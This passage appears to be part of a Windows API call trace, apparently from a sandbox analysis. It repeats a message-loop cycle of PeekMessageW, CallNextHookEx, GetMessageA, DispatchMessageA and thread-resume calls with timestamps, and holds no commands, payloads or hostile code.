wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0108.198] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0108.198] WaitMessage () returned 1 [0111.457] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0111.457] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0111.457] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0111.457] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0111.457] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0111.457] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0111.458] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0111.458] ResumeThread (hThread=0x260) returned 0x0 [0111.458] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0111.458] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0111.458] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0111.458] WaitMessage () returned 1 [0114.773] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0114.773] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0114.773] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0114.773] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0114.773] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0114.773] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0114.773] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0114.773] ResumeThread (hThread=0x260) returned 0x0 [0114.773] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0114.773] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0114.773] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0114.773] WaitMessage () returned 1 [0118.109] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0118.109] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0118.109] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0118.109] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0118.109] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0118.109] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0118.109] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0118.109] ResumeThread (hThread=0x260) returned 0x0 [0118.109] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0118.109] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0118.109] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0118.109] WaitMessage () returned 1 [0121.376] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0121.376] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0121.376] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0121.377] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0121.377] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0121.377] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0121.377] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0121.377] ResumeThread (hThread=0x260) returned 0x0 [0121.377] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0121.377] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0121.377] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0121.377] WaitMessage () returned 1 [0124.756] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0124.756] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0124.756] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0124.756] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0124.756] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0124.756] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0124.756] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0124.756] ResumeThread (hThread=0x260) returned 0x0 [0124.756] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0124.756] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0124.756] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0124.756] WaitMessage () returned 1 [0128.191] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0128.191] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0128.192] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0128.192] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0128.192] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0128.192] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0128.192] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0128.192] ResumeThread (hThread=0x260) returned 0x0 [0128.192] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0128.192] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0128.192] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0128.192] WaitMessage () returned 1 [0131.406] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0131.406] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0131.406] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0131.406] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0131.406] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0131.406] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0131.406] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0131.406] ResumeThread (hThread=0x260) returned 0x0 [0131.406] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0131.406] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0131.406] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0131.406] WaitMessage () returned 1 [0134.692] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0134.692] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0134.692] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0134.692] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0134.693] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0134.693] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0134.693] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0134.693] ResumeThread (hThread=0x260) returned 0x0 [0134.693] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0134.693] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0134.693] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0134.693] WaitMessage () returned 1 [0138.220] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0138.221] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0138.221] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0138.221] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0138.221] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0138.221] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0138.221] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0138.221] ResumeThread (hThread=0x260) returned 0x0 [0138.221] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0138.221] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0138.221] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0138.221] WaitMessage () returned 1 [0141.484] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0141.484] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0141.485] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0141.485] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0141.485] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0141.485] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0141.485] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0141.485] ResumeThread (hThread=0x260) returned 0x0 [0141.485] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0141.485] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0141.485] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0141.485] WaitMessage () returned 1 [0144.786] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0144.786] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0144.786] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0144.786] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0144.786] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0144.786] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0144.786] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0144.786] ResumeThread (hThread=0x260) returned 0x0 [0144.786] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0144.786] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0144.786] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0144.786] WaitMessage () returned 1 [0148.080] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0148.080] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0148.080] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0148.080] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0148.080] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0148.080] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0148.080] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0148.080] ResumeThread (hThread=0x260) returned 0x0 [0148.080] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0148.080] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0148.080] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0148.080] WaitMessage () returned 1 [0151.375] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0151.375] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0151.375] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0151.375] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0151.375] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0151.375] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0151.375] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0151.375] ResumeThread (hThread=0x260) returned 0x0 [0151.375] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0151.375] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0151.375] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0151.375] WaitMessage () returned 1 [0154.682] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0154.682] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0154.682] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0154.682] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0154.682] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0154.682] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0154.683] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0154.683] ResumeThread (hThread=0x260) returned 0x0 [0154.683] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0154.683] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0154.683] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0154.683] WaitMessage () returned 1 [0157.980] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0157.980] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0157.981] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0157.981] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0157.981] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0157.981] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0157.981] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0157.981] ResumeThread (hThread=0x260) returned 0x0 [0157.981] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0157.981] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0157.981] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0157.981] WaitMessage () returned 1 [0161.272] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0161.272] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0161.272] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0161.272] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0161.272] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0161.272] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0161.272] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0161.272] ResumeThread (hThread=0x260) returned 0x0 [0161.272] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0161.272] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0161.273] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0161.273] WaitMessage () returned 1 [0164.568] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0164.569] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0164.569] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0164.569] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0164.569] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0164.569] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0164.569] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0164.569] ResumeThread (hThread=0x260) returned 0x0 [0164.569] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0164.569] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0164.569] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0164.569] WaitMessage () returned 1 [0167.859] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0167.860] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0167.860] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0167.860] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0167.860] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0167.860] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0167.860] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0167.860] ResumeThread (hThread=0x260) returned 0x0 [0167.860] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0167.860] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0167.860] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0167.860] WaitMessage () returned 1 [0171.171] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0171.171] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0171.177] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0171.177] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0171.178] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0171.178] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0171.178] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0171.178] ResumeThread (hThread=0x260) returned 0x0 [0171.178] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0171.178] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0171.178] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0171.178] WaitMessage () returned 1 [0174.506] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0174.506] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x0, lParam=0x13ff1bc) returned 0x0 [0174.507] GetMessageA (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0174.507] CallNextHookEx (hhk=0xf00df, nCode=0, wParam=0x1, lParam=0x13ff204) returned 0x0 [0174.507] TranslateMessage (lpMsg=0x13ff2dc) returned 0 [0174.507] DispatchMessageA (lpMsg=0x13ff2dc) returned 0x1 [0174.507] GetExitCodeThread (in: hThread=0x260, lpExitCode=0x13ff0e4 | out: lpExitCode=0x13ff0e4) returned 1 [0174.507] ResumeThread (hThread=0x260) returned 0x0 [0174.507] SetThreadPriority (hThread=0x260, nPriority=0) returned 1 [0174.507] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0174.507] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 0 [0174.507] WaitMessage () returned 1 [0177.764] PeekMessageW (in: lpMsg=0x13ff2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x13ff2dc) returned 1 [0177.765] CallNextHookEx 